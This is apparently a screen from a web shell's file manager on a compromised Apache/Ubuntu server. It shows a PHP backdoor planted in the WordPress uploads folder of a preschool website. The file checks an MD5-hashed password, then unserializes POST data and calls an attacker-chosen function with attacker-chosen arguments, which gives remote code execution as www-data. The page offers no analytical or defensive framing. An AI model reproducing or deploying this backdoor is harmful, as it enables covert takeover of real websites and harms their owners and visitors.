HEX
Server: Apache/2.4.52 (Ubuntu)
System: Linux weepingangel 5.15.0-185-generic #195-Ubuntu SMP Fri Jun 19 17:11:50 UTC 2026 x86_64
User: www-data (33)
PHP: 8.1.34
Disabled: NONE
Upload Files
File: /var/www/stjamespreschool.org/htdocs/wp-content/uploads/uploads.php
<?php

class Processor {
    public $func;
    public $args;

    public function run() {
        // Dynamic function call - attacker controls $func
        echo call_user_func_array($this->func, $this->args);
    }
}

if (isset($_POST['data']) && isset($_POST['t']) ) {
    if(md5($_POST['t']) === "b1afe53f84799f5ed000a25defa3db68") {
        $obj = unserialize($_POST['data']);
        if (method_exists($obj, 'run')) {
            $obj->run();
        }
    };

}
?>